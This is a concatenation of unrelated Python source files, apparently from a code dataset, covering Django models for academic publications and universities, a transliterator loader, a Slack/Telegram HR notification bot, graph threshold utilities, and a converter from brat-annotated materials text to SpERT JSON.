status = models.CharField(max_length=100)
surname = models.CharField(max_length=100)
url = models.CharField(max_length=255)
school_name = models.CharField(max_length=255, default='')
russian_fullname = models.CharField(max_length=255, default='')
job_category = models.CharField(max_length=255, default='')
job_position = models.CharField(max_length=255, default='')
job_unit = models.CharField(max_length=255, default='')
job_parent_unit = models.CharField(max_length=255, default='')
job_rate = models.CharField(max_length=255, default='0.0')
type_employment = models.CharField(max_length=255, default='')
date_birth = models.DateField(default=datetime.date(1900, 1, 1))
last_degree = models.CharField(max_length=255, default='')
phd = models.BooleanField(default=False)
last_academic_title = models.CharField(max_length=255, default='')
relevant = models.BooleanField(default=False)
class Journal(models.Model):
sourcetitle = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=200)
type_journal = models.CharField(max_length=100)
issn = models.CharField(max_length=100)
source_id = models.IntegerField(null=True)
cnt_publications = models.IntegerField(default=0)
class Document(models.Model):
class Meta:
db_table = 'api_document'
eid = models.CharField(max_length=200)
doi = models.CharField(max_length=200)
pii = models.CharField(max_length=200, default="-1")
pubmed_id = models.CharField(max_length=200)
title = models.CharField(max_length=255)
subtype = models.CharField(max_length=200)
# subtype_description = models.CharField(max_length=200)
creator = models.ForeignKey(Author, on_delete=models.CASCADE)
author_count = models.IntegerField(default=0)
cover_date = models.DateField()
cover_display_date = models.CharField(max_length=200)
publication_name = models.CharField(max_length=255)
issn = models.ForeignKey(Journal, on_delete=models.CASCADE)
source_id = models.CharField(max_length=200)
eIssn = models.CharField(max_length=200)
aggregation_type = models.CharField(max_length=200)
volume = models.CharField(max_length=100, default="0")
issue_identifier = models.CharField(max_length=200)
article_number = models.CharField(max_length=200)
page_range = models.CharField(max_length=200, default="-1")
description = models.TextField()
authkeywords = models.TextField()
citedby_count = models.IntegerField(default=0)
openaccess = models.IntegerField(default=0)
fund_acr = models.CharField(max_length=200)
fund_no = models.CharField(max_length=200)
fund_sponsor = models.CharField(max_length=200)
citation_by_year = models.TextField(default="")
citation_by_year_with_self = models.TextField(default="")
class Subject(models.Model):
name = models.CharField(max_length=200)
full_name = models.CharField(max_length=255)
class DocumentSubject(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE, default=0)
class AuthorJournal(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_journal = models.ForeignKey(Journal, on_delete=models.CASCADE, default=0)
class AuthorUniversity(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
class DocumentAuthorUniversity(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class AuthorSubject(models.Model):
id_author = models.ForeignKey(Author, on_delete=models.CASCADE)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE)
class DocumentUniversityAffiliations(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class Rankings(models.Model):
name = models.CharField(max_length=255)
class UniversityRankPlace(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
year = models.IntegerField(default=0)
place = models.CharField(max_length=255, default="")
class UniversityRankCriteria(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
criteria = models.CharField(max_length=255, default="")
score = models.FloatField(default=0.0)
class DateCitationCount(models.Model):
date = models.DateField(auto_now=True)
citation_count = models.IntegerField(default=0)
self_citation_count = models.IntegerField(default=0)
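# Illustrative query sketch (not part of the original models file): once these
# models are migrated, standard Django ORM calls apply. The filter values below
# are hypothetical.
#
#     Document.objects.filter(cover_date__year=2020).count()
#     Author.objects.filter(affilation_current__country='Kazakhstan')
#     UniversityRankPlace.objects.filter(id_ranking__name='QS', year=2021)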
| 2.125 | 2 |
graphtransliterator/transliterators/__init__.py | seanpue/graphtransliterator | 4 | 12796844 | <filename>graphtransliterator/transliterators/__init__.py
# -*- coding: utf-8 -*-
"""
graphtransliterator.transliterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bundled transliterators are loaded by explicitly importing
:mod:`graphtransliterator.transliterators`. Each is an instance of
:class:`graphtransliterator.transliterators.Bundled`.
"""
from .bundled import Bundled # noqa
from .schemas import MetadataSchema # noqa
import inspect
import pkgutil
__all__ = ['Bundled', 'MetadataSchema', 'iter_names', 'iter_transliterators']
_transliterators = []
def _skip_class_name(name):
"""Determine if the class name should be skipped."""
return name == "Bundled" or name.startswith("_")
def add_transliterators(path=__path__):
"""Walk submodules and loads bundled transliterators into namespace.
Bundled transliterators are stored as ``Bundled`` subclass.
Parameters
----------
path : list
List of paths, must be an iterable of strings
Raises
------
ValueError
A transliterator of the same name already has been loaded."""
for loader, module_name, is_pkg in pkgutil.walk_packages(path):
# if it is not a submodule, skip it.
if not is_pkg:
continue
_module = loader.find_module(module_name).load_module(module_name)
for name, _obj in inspect.getmembers(_module, inspect.isclass):
# Skip Bundled, as it is already loaded
# Skip any classes starting with _
if _skip_class_name(name):
continue
if name in __all__:
raise ValueError(
'A transliterator named "{}" already exists'.format(name)
)
# import module and add class to globals, so that it will show up as
# graphtransliterator.transliterators.TRANSLITERATORNAME
assert len(_module.__path__) == 1 # There should be only one path
globals()[name] = getattr(_module, name)
__all__.append(name)
_transliterators.append(name)
add_transliterators()
def iter_names():
"""Iterate through bundled transliterator names."""
for _ in _transliterators:
yield _
def iter_transliterators(**kwds):
"""Iterate through instances of bundled transliterators."""
for _ in iter_names():
yield (eval(_ + "()"))
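# Example usage (an illustrative sketch, not taken from the package docs):
#
#     import graphtransliterator.transliterators as transliterators
#     for name in transliterators.iter_names():          # bundled transliterator names
#         print(name)
#     for bundled in transliterators.iter_transliterators():
#         print(type(bundled).__name__)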
| 2.28125 | 2 |
employee_portal/chat_bots/sender_bots.py | Dmitriy200123/employee_portal | 0 | 12796845 | import enum
import datetime
from chat_bots.models import Sender
from slack_bot.bot import SlackBot
from telegram_bot.bot import TelegramBot
class MessengerType(enum.Enum):
Telegram = 'Telegram'
Slack = 'Slack'
class SenderBots:
new_employee_channel_id = None
new_employee_chat_bot = None
access_request_channel_id = None
access_request_chat_bot = None
@staticmethod
def updateBots():
sender = Sender.objects.first()
if sender:
employee_chat_bot = sender.newEmployeeChatBot
access_chat_bot = sender.accessRequestChatBot
SenderBots.new_employee_channel_id = sender.newEmployeeChannelId
SenderBots.access_request_channel_id = sender.accessRequestChannelId
SenderBots.new_employee_chat_bot = SenderBots.createBot(employee_chat_bot)
SenderBots.access_request_chat_bot = SenderBots.createBot(access_chat_bot)
@staticmethod
def createBot(chat_bot):
if chat_bot.botType.messenger_type == MessengerType.Telegram.name:
return TelegramBot(chat_bot.token)
if chat_bot.botType.messenger_type == MessengerType.Slack.name:
return SlackBot(chat_bot.token)
@staticmethod
def getCorrectTime():
time = Sender.objects.filter(newEmployeeChannelId=SenderBots.new_employee_channel_id).first().sendTime
now = datetime.datetime.now().time()
date = datetime.date.today()
if time < now:
date = date + datetime.timedelta(days=1)
return datetime.datetime.combine(date, time)
@staticmethod
def sendNewEmployeeMessage(data):
message = f"Новый сотрудник: {data['first_name']} {data['second_name']}. Отдел: {data['department']}," \
f" должность: {data['position']}"
correct_time = SenderBots.getCorrectTime()
SenderBots.new_employee_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
@staticmethod
def sendAccessEmployeeMessage(user, services):
message = f"{user.first_name} {user.second_name} запрашивает доступ к следующим сервисам: {', '.join(services)}"
correct_time = SenderBots.getCorrectTime()
        SenderBots.access_request_chat_bot.post_scheduled_message(date=correct_time, message=message,
                                                                   channel_id=SenderBots.access_request_channel_id)
if Sender.objects.first():
SenderBots.updateBots()
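# Illustrative usage sketch (hypothetical values; the dict keys mirror the ones read
# by sendNewEmployeeMessage above, and `user` stands for any object exposing
# first_name/second_name attributes):
#
#     SenderBots.sendNewEmployeeMessage({
#         'first_name': 'Ivan', 'second_name': 'Petrov',
#         'department': 'IT', 'position': 'Engineer',
#     })
#     SenderBots.sendAccessEmployeeMessage(user, ['GitLab', 'Jira'])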
| 2.3125 | 2 |
scripts/generate_gantt_chart.py | spisakt/PUMI | 5 | 12796846 | <reponame>spisakt/PUMI
#!/usr/bin/env python
# start it like: scripts/generate_gantt_chart.py
# from the project folder
import PUMI.utils.resource_profiler as rp
rp.generate_gantt_chart('/Users/tspisak/Dropbox/comp/PAINTeR/szeged/run_stats.log', cores=8) | 1.429688 | 1 |
zvt/domain/quotes/coin/coin_tick_kdata.py | manstiilin/zvt | 1 | 12796847 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from sqlalchemy.ext.declarative import declarative_base
# Cryptocurrency tick data
from zvdata.contract import register_schema
from zvt.domain.quotes.coin import CoinTickCommon
CoinTickKdataBase = declarative_base()
class CoinTickKdata(CoinTickKdataBase, CoinTickCommon):
__tablename__ = 'coin_tick_kdata'
register_schema(providers=['ccxt'], db_name='coin_tick_kdata', schema_base=CoinTickKdataBase)
| 1.929688 | 2 |
cui/register/auth/GiHubApi.Authorizations.List.20170109081152453/AccountGetter.py | ytyaru/GitHub.Upload.UserRegister.Insert.Token.201704031122 | 0 | 12796848 | <reponame>ytyaru/GitHub.Upload.UserRegister.Insert.Token.201704031122
#!python3
#encoding:utf-8
import sqlite3
#from AuthList import AuthList
import AuthList
import traceback
import pyotp
class AccountGetter:
    def __init__(self):
        self.connector = None
        self.cursor = None
    def connect(self, db_path):
        self.connector = sqlite3.connect(db_path)
        self.cursor = self.connector.cursor()
| 1.984375 | 2 |
src/preprocessing/nodes_manager.py | NelloCarotenuto/Targeting-with-Partial-Incentives | 0 | 12796849 | import math
import random
__BASE_SEED = 1
def constant_thresholds(graph, value):
"""Sets a constant threshold for every node of the graph."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Add a constant attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = value
return thresholds
def degree_proportional_thresholds(graph, fraction=0.5):
"""Sets a threshold for every node of the graph to be proportional to its in-degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Compute the threshold based on the in-degree and add it to every node
for node in graph.Nodes():
degree = node.GetInDeg()
threshold = math.floor(degree * fraction) + 1
thresholds[node.GetId()] = threshold
return thresholds
def random_thresholds(graph, seed):
"""Sets a threshold for every node of the graph to be a random integer between 1 and its degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Set the random seed to be able to reproduce results
random.seed(__BASE_SEED + seed)
# Add a random attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = random.randint(1, node.GetDeg())
return thresholds
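# Minimal usage sketch (not part of the original module). The Nodes()/GetInDeg()
# calls above suggest a SNAP (snap-py) graph, so this assumes that library; the
# random graph below is purely illustrative.
if __name__ == "__main__":
    import snap

    demo_graph = snap.GenRndGnm(snap.PNGraph, 50, 200)  # 50 nodes, 200 directed edges
    print(constant_thresholds(demo_graph, 2))
    print(degree_proportional_thresholds(demo_graph, fraction=0.5))
    print(random_thresholds(demo_graph, seed=0))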
| 3.859375 | 4 |
entity_relation_extraction/testmasp.py | Zeng-WH/MaterBERT | 5 | 12796850 | <reponame>Zeng-WH/MaterBERT
import json
import os
import glob
'''Convert the MSP corpus into a format that the pipeline can recognize.'''
def find_all(sub, s):
index_list = []
index = s.find(sub)
while index != -1:
index_list.append(index)
index = s.find(sub, index + 1)
if len(index_list) > 0:
return index_list
else:
return -1
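# For illustration: find_all('a', 'banana') returns [1, 3, 5]; a substring that never occurs returns -1.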
'''
with open('./mspcorpus/101002adma200903953.txt') as f1:
text = f1.read()
with open('./mspcorpus/101002adma200903953.ann') as f2:
ann = f2.read()
text1 = text.split('\n')
space_all = find_all(' ', text)
line_all = find_all('\n', text)
line_all.append(10000000)
text_list = []
for i in range(len(line_all)-1):
temp_list = []
temp_list.append(line_all[i]+1)
for j in space_all:
if j>=line_all[i] and j<=line_all[i+1]:
temp_list.append(j+1)
text_list.append(temp_list)
#print(text[text_list[1][-1]])
ann_list = ann.split('\n')
entity_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line)>2:
if ann_line[0][0] == 'T':
entity_list.append(ann_line)
#print('bupt')
'''
def convert_text(text):
space_all = find_all(' ', text)
line_all = find_all('\n', text)
line_all.append(10000000)
text_list = []
for i in range(len(line_all) - 1):
temp_list = []
temp_list.append(line_all[i] + 1)
for j in space_all:
if j >= line_all[i] and j <= line_all[i + 1]:
temp_list.append(j + 1)
text_list.append(temp_list)
return text_list
def convert_sentence_new(text):
    # Split the text into sentences based on '. '
space_all = find_all(' ', text)
sent_all = find_all('. ', text)
sent_all.append(10000000)
sent_list = []
for i in range(len(sent_all) - 1):
temp_list = []
temp_list.append(sent_all[i]+1)
for j in space_all:
if j>= sent_all[i] and j<= sent_all[i + 1]:
temp_list.append(j+1)
sent_list.append(temp_list)
return sent_list
def convert_ann(ann):
ann_list = ann.split('\n')
entity_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line) > 2:
if ann_line[0][0] == 'T':
entity_list.append(ann_line)
return entity_list
def convert_relation(ann):
ann_list = ann.split('\n')
relation_list = []
for ann_line in ann_list:
ann_line = ann_line.split('\t')
if len(ann_line) > 2:
if ann_line[0][0] == 'R':
relation_list.append(ann_line)
return relation_list
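# For illustration, a brat-style standoff relation line that this collects looks like
#     R1\tSomeRelation Arg1:T3 Arg2:T7\t...
# (relation name and entity IDs are hypothetical; only lines whose first field starts
# with 'R' and that carry at least three tab-separated fields are kept).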
def convert_entity(text, text_list, entity_list):
text_line = text.split('\n')
line_split = find_all('\n', text)
entity_result = []
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp > row:
break
for start_word, ele in enumerate(text_list[row_index]):
if ele == start_temp:
temp_result['start'] = start_word
for end_word, ele in enumerate(text_list[row_index]):
if end_temp < ele:
temp_result['end'] = end_word
entity_result[row_index].append(temp_result)
return entity_result
#result = convert_entity(text, text_list, entity_list)
def convert_entity_v1(text, text_list, entity_list):
text_line = text.split('\n')
line_split = find_all('\n', text)
entity_result = []
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp > row:
break
for start_word, ele in enumerate(text_list[row_index]):
if ele == start_temp:
temp_result['start'] = start_word-1
for end_word, ele in enumerate(text_list[row_index]):
if end_temp < ele:
temp_result['end'] = end_word-1
entity_result[row_index].append(temp_result)
return entity_result
def convert_entity_new(text, text_list, entity_list):
line_split = find_all('\n', text)
line_split.append(10000000)
entity_result = []
entity_dict ={}
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
dict_temp = []
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp < row:
break
dict_temp.append(row_index-1)
for start_word, ele in enumerate(text_list[row_index-1]):
if ele == start_temp:
temp_result['start'] = start_word
for end_word, ele in enumerate(text_list[row_index-1]):
if end_temp < ele:
temp_result['end'] = end_word
break
# print(end_temp)
if end_temp > text_list[row_index-1][-1]:
temp_result['end'] = len(text_list[row_index-1])
entity_result[row_index-1].append(temp_result)
dict_temp.append(len(entity_result[row_index-1])-1)
entity_dict[temp_entity[0]] = dict_temp
return entity_result, entity_dict
'''
result, dict_test = convert_entity_new(text, text_list, entity_list)
relation = convert_relation(ann)
'''
def convert_entity_new_v1(text, text_list, entity_list):
line_split = find_all('. ', text)
line_split.append(10000000)
entity_result = []
entity_dict ={}
for i in range(len(text_list)):
entity_result.append([])
for temp_entity in entity_list:
temp_result = {}
dict_temp = []
temp = (temp_entity[1]).split(' ')
start_temp = int(temp[1])
end_temp = int(temp[2])
temp_result['type'] = temp[0]
for row_index, row in enumerate(line_split):
if start_temp < row:
break
dict_temp.append(row_index-1)
for start_word, ele in enumerate(text_list[row_index-1]):
if ele == start_temp:
temp_result['start'] = start_word-1
for end_word, ele in enumerate(text_list[row_index-1]):
if end_temp < ele:
temp_result['end'] = end_word-1
break
# print(end_temp)
if end_temp > text_list[row_index-1][-1]:
temp_result['end'] = len(text_list[row_index-1])
entity_result[row_index-1].append(temp_result)
dict_temp.append(len(entity_result[row_index-1])-1)
entity_dict[temp_entity[0]] = dict_temp
return entity_result, entity_dict
def convert_relation_new(relation, text_list, entity_dict):
relation_result = []
for i in range(len(text_list)):
relation_result.append([])
for relation_line in relation:
temp = (relation_line[1]).split(' ')
if temp[1][5] == 'T' and temp[2][5] == 'T':
arg1_temp = temp[1][5:]
arg2_temp = temp[2][5:]
if entity_dict[arg1_temp][0] == entity_dict[arg2_temp][0]:
temp_dict = {}
temp_dict['type'] = temp[0]
temp_dict['head'] = entity_dict[arg1_temp][1]
temp_dict['tail'] = entity_dict[arg2_temp][1]
relation_result[entity_dict[arg1_temp][0]].append(temp_dict)
return relation_result
def joint_entity_relation_token(text, entity_result, relation_result, id, documents):
text_line = text.split('\n')
#document = []
for i in range(len(entity_result)):
id = id + 1
document_dict = {}
document_dict['tokens'] = (text_line[i+1]).split(' ')
document_dict['entities'] = entity_result[i]
document_dict['relations'] = relation_result[i]
document_dict['orig_id'] = id
documents.append(document_dict)
return documents
def joint_entity_relation_token_v1(text, entity_result, relation_result, id, documents):
text_line = text.split('. ')
#document = []
for i in range(len(entity_result)):
id = id + 1
document_dict = {}
document_dict['tokens'] = (text_line[i+1]).split(' ')
document_dict['entities'] = entity_result[i]
document_dict['relations'] = relation_result[i]
document_dict['orig_id'] = id
documents.append(document_dict)
return documents
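# Each emitted record follows the SpERT-style JSON layout assembled above, e.g.
# (entity/relation type names and values are hypothetical):
#   {"tokens": ["The", "alloy", "..."],
#    "entities": [{"type": "Material", "start": 1, "end": 2}],
#    "relations": [{"type": "Property_of", "head": 0, "tail": 1}],
#    "orig_id": 42}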
'''
tess = convert_relation_new(relation, text_list, dict_test)
document = joint_entity_relation_token(text, result, tess)
'''
def main():
documents =[]
textfiles = glob.glob('/home1/wlw2020/head_motion/SpERT/corpus/data/*.txt')
index = 1
for text_file in textfiles:
temp = text_file.split('.txt')
ann_temp = temp[0]
ann_file = ''.join([ann_temp, '.ann'])
with open(text_file) as f1:
text = f1.read()
with open(ann_file) as f2:
ann = f2.read()
text_list = convert_sentence_new(text)
#print(len(text_list[1]))
entity_list = convert_ann(ann)
entity_result, entity_dict = convert_entity_new_v1(text, text_list, entity_list)
relation = convert_relation(ann)
relation_result = convert_relation_new(relation, text_list, entity_dict)
documents = joint_entity_relation_token_v1(text, entity_result, relation_result, index, documents)
index = index + len(entity_result)
    # Keep only sentences with more than two tokens; filtering into a new list
    # avoids removing items from a list while iterating over it.
    documents = [document for document in documents if len(document['tokens']) > 2]
with open('./documents_example_v1.json', 'w') as f3:
json.dump(documents, f3)
if __name__ == '__main__':
main()
print('pku')
| 2.546875 | 3 |